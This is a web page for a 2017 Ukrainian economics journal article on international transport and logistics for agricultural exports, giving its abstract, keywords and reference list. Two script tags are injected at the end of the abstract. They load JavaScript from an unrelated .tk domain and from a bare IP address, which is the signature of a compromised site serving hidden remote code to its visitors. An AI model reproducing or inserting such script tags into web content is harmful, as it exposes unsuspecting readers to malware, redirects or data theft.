ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 339.94:631.145 (477+510)
Зовнішньоекономічні відносини

Міжнародні перевезення у зовнішній торгівлі продукцією АПК / Стукач Т.М. // Економіка АПК. - 2017. - № 9 - С. 46

Мета статті - дослідити сучасний стан організації міжнародних перевезень продукції АПК, розкрити їхні особливості та окреслити напрями поліпшення ситуації на ринку агрологістики. Теоретичною й методологічною базою дослідження є праці науковців щодо проблем ефективного використання та розвитку міжнародних транспортних перевезень, транспортного обслуговування сільгосппідприємств і питань організації перевезень в аграрному секторі економіки країни. Робота ґрунтується на загальнонаукових та спеціальних методах дослідження, теоретичного узагальнення, порівняння, економіко-статистичного. Дослідження формулює авторський погляд на сучасний процес організації міжнародних перевезень продукції вітчизняного АПК і дає змогу виділити складові процесу управління агрологістикою. Як елемент наукової новизни запропоновано механізм активізації створення логістичних агрохабів для українських експортерів із метою збільшення обсягів експорту продукції до країн Азії й Африки. Дослідження сприяє розробці загальнонаціональної програми розвитку транспортних перевезень при експортуванні продукції АПК. Рис.: 2. Бібліогр.: 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: транспорт, міжнародні транспортні перевезення, продукція АПК, перевезення сільськогосподарської продукції, агрохаби

Список використаних джерел

 1. Velychko O.P. Peculiarities of activity of agro-logistic providers in Ukraine / O.P. Velichko // Ekonomіka APK. - 2016. - No. 2. - P. 51 - 57.
 2. Velychko O.P. Formation of logistic systems in the modern agribusiness of Ukraine / O.P. Velichko // Economy and the state: scientific-pract. journ. - 2011. - No. 12. - P. 63-65.
 3. Greiz G. M. Improvement of research methods of supply chains based on gap-analysis / Greiz G.М., Kuzmenko Y.H., Markovskiy V.A. // Vestn. South Ural State Unity Series “Economics and Management”. - 2013. - T. 7. - No. 1. - P. 161-164.
 4. State Statistics Service of Ukraine [Electronic resource]. - Access mode: http://ukrstat.gov.ua.
 5. Dykan V.L. Consolidation of possibilities of industry and transport in the conditions of international transport corridors as a way of stopping crisis phenomena in the economy of Ukraine / V.L. Dykan, N.V. Yakymenko // Vysn. Economy of transport and industry. - 2014. - No. 30. - P. 11-16.
 6. Dorokhovskyi O.M. Problems and prospects of development of transport-logistic system of Ukraine / O.M. Dorokhovskyi // Economy and management. - 2015. - No. 5. - P. 60-65.
 7. Concept of the State Target Program for the Development of Agrarian Sector of the Economy for the Period until 2020 [Electronic Resource]. - Access mode: http://minagro.gov.ua/apk?nid=16822.
 8. Kosareva T.V. Agrarian logistics: essence and multidimensionality / T.V. Kosareva / Economy of the agro-industrial complex: international. scient. journ. - 2014. - No. 10. - P. 37-43.
 9. Ministry of Economy of Ukraine [Electronic resource]. - Access mode: http://www.me.gov.ua.
 10. Pugachov M.I. Logistic activity in supply chains / M.I. Pugachov // Logistics: problems and solutions. - 2014. - No 3. - P. 56-60.
 11. Sobolev D.A. The role of state regulation tools in improving logistics system of grain trade in Ukraine / D.A. Sobolev // Economy of the agro-industrial complex: international. scient. journ. - 2016. - No. 8. - P. 44-47.
 12. Shubravskaya E.V. Prospects for modernization of the agrarian sector of Ukraine / E.V. Shubravskaya, E.A. Prokopenko // Economy of Ukraine. - 2015. - No. 8. - P. 64-75.
 13. Herts S., Alfredsson M. Strategic development of third party logistics providers / S. Herts, M. Alfredsson // Industrial Marketing Management. - 2003. - Vol. 32. - Р. 139-149.
 14. Riccio E.F. Logistics frankly speaking / E.F. Riccio. - 2006. - 168 р.
 15. Marketing Channels. - New Jersey, 2010. - 621 р.
 16. Paul R. Murphyjr, Donald F. Wood. Contemporary Logistics / Paul R. Murphyjr, Donald F. Wood. - New Jersey, 2011. - 432 р.
 17. Jain V., Khan S.A. Reverse logistics service provider selection: A TOPSIS - QFD approach / V. Jain, S.A. Khan // International Conference on Industrial Engineering and Engineering Management. - 2016. - Р. 803-806.
 18. Sirisawat P., Kiataharoenpol T. Correlation of barriers to reverse logistics performance using structural equation modeling / P. Sirisawat, T. Kiataharoenpol // International Conference on Industrial Engineering and Engineering Management. - 2016. - Р. 809-812.

Читати статтю: e_apk_2017_9_8.pdf